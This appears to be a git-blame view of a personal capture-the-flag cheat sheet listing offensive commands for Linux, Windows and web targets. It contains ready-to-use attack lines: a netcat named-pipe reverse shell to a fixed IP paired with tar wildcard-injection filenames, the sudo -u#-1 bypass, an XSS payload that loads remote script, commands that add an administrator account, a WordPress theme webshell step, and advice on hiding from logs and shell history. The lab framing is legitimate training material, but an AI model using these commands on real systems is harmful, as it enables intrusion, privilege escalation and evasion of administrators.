CTF-Writeups/Cheat Sheet.md

330 lines
10 KiB
Markdown
Raw Normal View History

2020-09-22 16:39:22 +00:00
# Linux
2020-12-13 16:23:34 +00:00
2020-09-22 16:39:22 +00:00
### Stablilize Shell
2020-09-10 20:03:04 +00:00
1. ctrl+z
2. stty raw -echo
3. fg (press enter x2)
4. export TERM=xterm , for using `clear` command
2020-09-22 16:39:22 +00:00
### Spawn bash
2020-09-10 20:03:04 +00:00
* /usr/bin/script -qc /bin/bash 1&>/dev/null
* python -c 'import pty;pty.spawn("/bin/bash")'
* python3 -c 'import pty;pty.spawn("/bin/bash")'
2020-12-18 01:29:22 +00:00
### Vulnerable sudo (ALL,!root)
2020-12-18 01:29:40 +00:00
`sudo -u#-1 whoami`<br />
2020-12-18 01:29:22 +00:00
`sudo -u#-1 <path_of_executable_as_other_user>`
2020-10-18 18:16:43 +00:00
2020-11-29 16:45:22 +00:00
### Execute as diffent user
`sudo -u <user> <command>`
2020-12-09 16:25:40 +00:00
### FTP
Connect to ftp on the machine<br/>
`ftp user <ip>`
2020-12-11 22:26:41 +00:00
After successfully logged in you can download all files with
`mget *`
2020-12-09 16:25:40 +00:00
Download files recusively<br/>
` wget -r ftp://user:pass@<ip>/ `
2020-11-03 16:30:29 +00:00
### SMB Shares
2020-10-25 12:41:05 +00:00
#### SmbClient
2020-10-25 14:00:03 +00:00
* `smbclient -L \\\\<ip\\` listing all shares
* `smbclient \\\\<ip>\\<share>` accessing a share anonymously
* `smbclient \\\\10.10.209.122\\<share> -U <share> `accessing a share with an authorized user
2020-10-25 13:56:23 +00:00
2020-10-25 12:41:05 +00:00
#### Smbmap
2020-10-25 13:51:30 +00:00
* `smbmap -u <username> -p <password> -H <ip>`
2020-10-18 18:16:43 +00:00
2020-10-25 13:56:23 +00:00
#### Smbget
* `smbget -R smb://<ip>/<share>`
2020-11-03 16:30:29 +00:00
### NFS shares
2020-11-03 16:29:50 +00:00
* `showmount -e <ip> ` This lists the nfs shares
* `mount -t nfs <ip>:/<share_name> <directory_where_to_mount>` Mounting that share
2020-11-03 18:48:42 +00:00
2020-11-10 16:01:18 +00:00
### Cronjobs
* cronjobs for specific users are stored in `/var/spool/cron/cronjobs/`
* `crontab -u <user> -e ` Check cronjobs for a specific user
* `crontab -l` cronjob for the current user
* `cat /etc/crontab` system wide cronjobs
2020-09-22 16:39:22 +00:00
### Finding Binaries
2020-09-10 20:03:04 +00:00
* find . - perm /4000 (user id uid)
* find . -perm /2000 (group id guid)
2020-11-03 18:48:42 +00:00
### Finding File capabilites
`getcap -r / 2>/dev/null`
2020-11-16 21:55:44 +00:00
### Finding text in a files
`grep -rnw '/path/to/somewhere/' -e 'pattern'
`
2020-09-22 16:39:22 +00:00
### Changing file attributes
2020-09-10 20:05:19 +00:00
chattr + i filename `making file immutable`<br/>
chattr -i filename `making file mutable`<br/>
2020-09-10 20:04:22 +00:00
lschattr filename `Checking file attributes`
2020-09-22 16:34:15 +00:00
2020-09-28 16:13:59 +00:00
### Uploading Files
2020-09-28 16:15:10 +00:00
scp file/you/want `user@ip`:/path/to/store <br/>
2020-09-28 16:14:40 +00:00
python -m SimpleHTTPServer [port] `By default will listen on 8000`<br/>
2020-10-22 15:52:58 +00:00
python3 -m http.server [port] `By default will listen on 8000`<br/>
2020-09-28 16:13:59 +00:00
2020-10-26 21:33:34 +00:00
### Downloading Files
2020-11-05 17:30:11 +00:00
`wget http://<ip>:port/<file>`
2020-10-26 21:33:34 +00:00
2020-11-01 16:56:22 +00:00
### Netcat to download files from target
`nc -l -p [port] > file` Receive file <br/>
`nc -w 3 [ip] [port] < file `Send file <br/>
2020-11-03 16:32:12 +00:00
### Cracaking Zip Archive
2020-11-03 17:48:36 +00:00
`fcrackzip -u -D -p <path_to_wordlist> <archive.zip>`
2020-11-03 16:32:12 +00:00
2020-11-07 15:50:46 +00:00
### Decrypting PGP key
If you have `asc` key which can be used for PGP authentication then
* john key.asc > asc_hash
* john asc_hash --wordlists=path_to_wordlist
#### Having pgp cli
* pgp --import key.asc
* pgp --decrypt file.pgp
#### Having gpg cli
* gpg --import key.asc
* gpg --decrypt file.pgp
2020-11-03 17:47:59 +00:00
### killing a running job in same shell
`jobs`
```
Find it's job number
$ jobs
[1]+ Running sleep 100 &
$ kill %1
[1]+ Terminated sleep 100
```
2020-11-05 16:59:26 +00:00
### SSH Port Forwarding
`ssh -L <port_that_is_blockd_>:localhost:<map_blocked_port> <username>@<ip>`
2020-11-03 17:47:59 +00:00
2020-12-12 16:13:20 +00:00
### Tar Exploitation
When ever you see a cronjob running with a command `cd /<user>/andre/backup tar -zcf /<folder>/filetar.gz *` go to that folder from which a backup is being created and running these command in that directory <br/ >
```
echo "mkfifo /tmp/lhennp; nc 10.2.54.209 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
```
2020-11-29 17:41:22 +00:00
### Binary Exploits
If there is a certain command running in a binary example `date` so we can create our own binary and add `/bin/bash` to and path so it gets executed<br/>
`export PATH=<path_where_binary_is>/:$PATH`
2020-12-13 16:23:34 +00:00
### Enumration
* cat /etc/*release
* cat /etc/issue
* uname -a
* lsb_release -a
* Running Linpeas
* ss -tulpn (for ports that are open on the machine)
2020-09-22 16:43:07 +00:00
# Windows
2020-09-22 16:34:15 +00:00
### Adding User
net user "USER_NAME" "PASS" /add
### Changing User's password
net user "USER_NAME" "NEWPASS"
### Adding User to Administrators
net localgroup administrators "USER_NAME" /add
2020-09-22 16:43:07 +00:00
### Changing File Permissions
2020-09-22 16:45:03 +00:00
CACLS files /e /p {USERNAME}:{PERMISSION}<br/>
Permissions:<br/>
2020-09-22 16:44:32 +00:00
1.R `Read`<br/>
2.W `Write`<br/>
3.C `Change`<br/>
2020-09-22 16:43:07 +00:00
4.F `Full Control`
2020-09-28 16:14:40 +00:00
2020-09-22 20:24:35 +00:00
### Set File bits
attrib +r filename `add read only bit`<br/>
attrib -r filename `remove read only bit`<br/>
attrib +h filename `add hidden bit `<br/>
attrib -h filename `remove hidden bit`
2020-09-28 16:14:40 +00:00
2020-09-22 20:24:35 +00:00
### Show hidden file/folder
dir /a `show all hidden files & folder`<br/>
dir /a:d `show only hidden folder`<br/>
dir /a:h `show only hidden files`<br/>
2020-10-26 21:33:34 +00:00
### Downloading Files
2020-10-26 21:42:27 +00:00
`certutil.exe -urlcache -f http://<ip>:<port>/<file> ouput.exe`<br />
2020-11-16 16:58:52 +00:00
`powershell -c "wget http://<ip>:<port>/<file>" -outfile output.exe`<br />
`powershell Invoke-WebRequest -Uri $ip -OutFile $filepath`
2020-09-22 16:39:22 +00:00
2020-11-05 14:51:03 +00:00
### Active Directory
`powershell -ep bypass` load a powershell shell with execution policy bypassed <br/>
`. .\PowerView.ps1` import the PowerView module
2020-11-16 16:58:52 +00:00
## List Drives
`wmic logicaldisk get caption`
2020-11-16 20:14:59 +00:00
## Decrypting PSCredential Object
* $file = Import-Clixml -Path <path_to_file>
* $file.GetNetworkCredential().username
* $file.GetNetworkCredential().password
2020-10-24 15:15:04 +00:00
# Msfvenom
### List All Payloads
msfvenom -l payloads
### List Payload Format
msfvenom --list formats
2020-09-24 18:50:52 +00:00
2020-10-24 15:15:04 +00:00
# Meterpreter
2020-09-24 18:50:52 +00:00
### Adding user for RDP
run getgui -u [USER_NAME] -p [PASS]
2020-11-08 16:43:56 +00:00
# Git
2020-12-02 17:34:02 +00:00
2020-11-08 16:43:56 +00:00
### Dumping repository
`./gitdumper.sh <location_of_remote_or_local_repostiory_having./.git> <destination_folder>`
### Extracting information from repository
`./extractor.sh <location_folder_having_.git_init> <extract_to_a_folder>`
2020-11-28 18:20:20 +00:00
# Web
### XSS to RCE
```
Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>
```
2020-12-06 17:09:16 +00:00
### SQL Map
`sqlmap -r request.txt --dbms=mysql --dump`
2020-12-04 17:08:12 +00:00
### Wfuzz
`wfuzz -c -z file,wordlist.txt --hh=0 http://<ip>/<path>/?date=FUZZ`
2020-11-28 18:20:20 +00:00
### API (Applicaton Programmable Interface)
* Check for possibility if there is a v1 , it is likely to be vulnerable to LFI
* Use wfuzz which is tool to fuzz for API end points or for parameter
`wfuzz -u http://<ip>:<port>/<api-endpoint>\?FUZZ\=.bash_history -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404` <br/>
Here `api-endpoint` can be for example `/api/v1/resources/books\?FUZZ\=.bash_history` "?" is before the parameter and FUZZ is telling to find a parameter and we are looking for `.bash_hitory` as an example
2020-11-29 18:42:53 +00:00
### Web Shell Bash
`bash -c "<bash_rev_shell>"`
2020-12-09 22:11:54 +00:00
### Wordpress
using wpscan we can find users or do some further enumeration of wordpress version
2021-01-02 14:19:14 +00:00
* `wpscan --url http://<ip>/wordpress -e u` Enumerate Users
* `wpscan --url http://<ip>/wordpress -e ap` Enumearte All plugins
2020-12-09 22:11:54 +00:00
To bruteforce passwords
* `wpscan --url <ip> -U user_file_path -P password_file_path`
After logging into the wordpress dashboard , we can edit theme's 404.php page with a php revershell
`http://<ip>/wordpress/wp-content/themes/twentytwenty/404.php`
2020-11-28 18:20:20 +00:00
# Wordlists
### Directory Bruteforcing
* /usr/share/wordlists/dirb/big.txt
* /usr/share/wordlists/dirb/common.txt
* /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
2020-12-02 17:36:23 +00:00
### Gobuster
* `gobuster dir -u http://<ip>/ -w <path_to_wordlist>`
* `gobuster dir -u http://<ip>/ -w <path_to_wordlist> -s "204,301,302,307,401,403"` (use status code if 200 is configured to respond on the web server to every get request)
2020-12-02 17:34:02 +00:00
### Feroxbuster
`feroxbuster -u http://<ip>/ -w <path_to_wordlist>`
2020-11-28 18:20:20 +00:00
2020-12-02 17:34:02 +00:00
### Dirsearch
`python3 dirsearch.py -u http://<ip>/ -w <path_to_text>`
### Credential Bruteforcing
2020-11-28 18:20:20 +00:00
* /usr/share/wordlists/rockyou.txt
* /usr/share/wordlists/fasstrackt.txt
* using `crackstation`
* using `seclists`
2020-11-29 18:42:53 +00:00
# Generating Worlists for directory brute force
### Cewl
This spiders the given url and finding keyowrds then makes a wordlists through it's findings<br/>
`cewl.rb <ip>`
2020-12-12 12:48:05 +00:00
# Finding Subdomains
`wfuzz -c -w <path_to_wordlist> -u 'http://domain.com -H 'Host: FUZZ.domain.com`
2020-09-22 16:39:22 +00:00
# King Of The Hill (KoTH)
2020-09-23 16:51:41 +00:00
### Monitoring and Closing Shell (Linux)
2020-09-22 16:39:22 +00:00
* strace `debugging / tamper with processes`
* gbd `c/c++ debugger`
* script - records terminal activites
* w /who `check current pts ,terminal device`
2020-10-22 15:51:56 +00:00
* ps -t ps/pts-number `process monitoring`
* script /dev/pts/pts-number `montior terminal`
2020-09-22 16:39:22 +00:00
* cat /dev/urandom > /dev/pts/pts-number 2>/dev/null `prints arbitary text on terminal`
* pkill -9 -t pts/pts-number
2020-10-31 15:04:52 +00:00
2020-10-31 15:18:55 +00:00
### Change SSH port
`nano /etc/ssh/sshd_config` (change PORT 22 to any port you want also you can tinker with configuration file)
2020-11-11 23:21:15 +00:00
`service sshd restart` (Restart SSH service to apply changes)
2020-10-31 15:20:31 +00:00
### Hide yourself from "w" or "who"
`ssh user@ip -T` This -T will have some limiations , that you cannot run bash and some other commands but is helpful.
2020-10-31 15:04:52 +00:00
### Run Bash script on king.txt
`while [ 1 ]; do /root/chattr -i king.txt; done &`
2020-10-22 15:51:56 +00:00
### Send messages to logged in users
* echo "msg" > /dev/pts/pts-number `send message to specific user`<br />
* wall msg `boradcast message to everyone`<br />
2020-09-23 16:51:41 +00:00
### Closing Session (Windows)
* quser
* logoff id|user_name
2020-10-09 12:19:57 +00:00
2020-12-11 17:07:42 +00:00
# Covering Track
11.11. Covering our Tracks
The final stages of penetration testing involve setting up persistence and covering our tracks. For today's material, we'll detail the later as this is not mentioned nearly enough.
During a pentesting engagement, you will want to try to avoid detection from the administrators & engineers of your client wherever within the permitted scope. Activities such as logging in, authentication and uploading/downloading files are logged by services and the system itself.
On Debian and Ubuntu, the majority of these are left within the "/var/log directory and often require administrative privileges to read and modify. Some log files of interest:
"/var/log/auth.log" (Attempted logins for SSH, changes too or logging in as system users:)
<img src="https://imgur.com/37aTxnI.png/>
"/var/log/syslog" (System events such as firewall alerts:)
<img src="https://imgur.com/k7scyUP.png/>
"/var/log/<service/"
For example, the access logs of apache2
/var/log/apache2/access.log
<img src="https://imgur.com/y8Rin3h.png/>
2020-12-11 18:04:49 +00:00
# Miscellaneous
2020-12-11 17:07:42 +00:00
2020-12-11 18:04:49 +00:00
## Turning off xfce beeping sound
`xset b off`
2020-11-13 12:04:09 +00:00
2020-11-13 12:05:07 +00:00
export HISTFILE=/dev/null found this it might help you out a little when doing KOTH it basically stops bash logging your commands in the ~/.bash_history file <br/>
sudo ifconfig tun0 down<br/>
sudo ip link set tun0 down<br/>
sudo ip link delete tun0<br/>
sudo systemctl restart systemd-networkd ; sudo systemctl status systemd-networkd<br/>